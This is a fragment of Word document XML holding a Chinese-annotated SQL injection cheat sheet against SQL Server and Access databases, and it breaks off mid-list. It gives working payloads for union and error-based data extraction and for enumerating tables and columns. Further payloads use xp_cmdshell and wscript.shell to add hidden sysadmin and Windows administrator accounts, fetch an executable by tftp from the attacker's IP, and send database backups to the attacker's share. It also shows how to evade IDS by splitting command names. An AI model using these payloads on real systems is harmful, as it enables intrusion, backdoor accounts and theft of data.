      <w:r w:rsidRPr="001F1794">
        <w:t>判断</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 0&lt;&gt;(select top 1 name from BBS.dbo.syscolumns where id=773577794) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>所有字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>(union</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>也好用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;create table [dbo].[swap] ([swappass][char](255));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and (select top 1 swappass from swap)=1-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@value_name='/', values=@test OUTPUT insert into paths(path) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>values(@test)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>;use ku1;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">;create table cmd (str image);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>建立</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>image</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>类型的表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>cmd </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>存在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的测试过程：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master..xp_cmdshell 'dir' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">;exec master.dbo.sp_addlogin jiaoniang$;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>加</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SQL</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master.dbo.sp_password null,jiaoniang$,1866574;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>/times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>/add';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">exec master..xp_servicecontrol 'start', 'schedule' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>启动服务</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_servicecontrol 'start', 'server' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SP_OAMETHOD @shell,'run',null, 'C</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\WINNT\system32\cmd.exe /c net user </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>jiaoniang$ 1866574 /add' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SP_OAMETHOD @shell,'run',null, 'C</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\WINNT\system32\cmd.exe /c net </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>localgroup administrators jiaoniang$ /add' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>TFTP</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>上传文件</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname set @a='xp'+'_cm</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>dshell' exec @a 'dir c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a;set @a=db_name();backup database @a to </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>disk='</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>你的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>你的共享目录</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>bak.dat' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>如果被限制则可以。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>select</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>master.dbo.sp_addlogin hax') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>查询构造：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">Select * FROM news Where id=... AND topic=... </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>AND ..... </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>admin'and 1=(select count(*) from [user] where username='victim' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>right(left(userpass,01),1)='1') and userpass &lt;&gt;' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select 123;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;use master;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">:a' or name like 'fff%';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>显示有一个叫</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ffff</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的用户哈。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1&lt;&gt;(select count(email) from [user]);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update [users] set email=(select top 1 name from sysobjects where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xtype='u' and status&gt;0) where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update [users] set email=(select top 1 id from sysobjects where xtype='u' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and name='ad') where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';update [users] set email=(select top 1 name from sysobjects where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xtype='u' and id&gt;581577110) where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';update [users] set email=(select top 1 count(id) from password) where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';update [users] set email=(select top 1 pwd from password where id=2) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';update [users] set email=(select top 1 name from password where id=2) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>where name='ffff';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>上面的语句是得到数据库中的第一个用户表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>并把表名放在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ffff</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>用户的邮箱字段中。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>通过查看</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ffff</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的用户资料可得第一个用表叫</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ad </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后根据表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ad</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到这个表的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到第二个表的名字</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into users values( 666, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into users values( 667,123,123,0xffff)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into users values ( 123, 'admin''--', 'password', 0xffff)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;and user&gt;0 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;and (select count(*) from sysobjects)&gt;0 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;and (select count(*) from mysysobjects)&gt;0 //</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>枚举出数据表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>status&gt;0);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>这是将第一个表名更新到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>aaa</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的字段处。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读出第一个表，第二个表可以这样读出来（在条件后加上</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> and name&lt;&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>刚才得到的表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>status&gt;0 and name&lt;&gt;'vote');-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id=1552 and exists(select * from aaa where aaa&gt;5) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读出第二个表，一个个的读出，直到没有为止。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读字段是这样：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update aaa set aaa=(select top 1 col_name(object_id('</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>'),1));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id=152 and exists(select * from aaa where aaa&gt;5)</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>出错，得到字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;update aaa set aaa=(select top 1 col_name(object_id('</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>'),2));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id=152 and exists(select * from aaa where aaa&gt;5)</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>出错，得到字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得数据表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>][</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>将字段值更新为表名，再想法读出这个字段的值就可得到表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">update </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>=(select top 1 name from sysobjects where xtype=u and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>status&gt;0 [ and name&lt;&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>你得到的表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>查出一个加一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">]) [ where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>条件</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] select top 1 name from </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>sysobjects where xtype=u and status&gt;0 and name not in('table1','table2',…) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SQLSERVER</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>注入</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>漏洞建</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>数据库管理员</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>和系统管理员</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>当前</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>必须是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SYSADMIN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>组</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得数据表字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>][</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>将字段值更新为字段名，再想法读出这个字段的值就可得到字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">update </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>=(select top 1 col_name(object_id('</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>要查询的数据表名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>'),</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>列如</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>:1) [ </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>条件</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>IDS</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的检测</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>使用变量</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>] </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname set @a='xp'+'_cm</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>dshell' exec @a 'dir c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>开启远程数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>基本语法</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'select * from table1' ) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>: (1) OLEDB Provider name </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>其中连接字符串参数可以是任何端口用来连接</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>比如</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from OPENROWSET('SQLOLEDB', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>from table' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>复制目标主机的整个数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
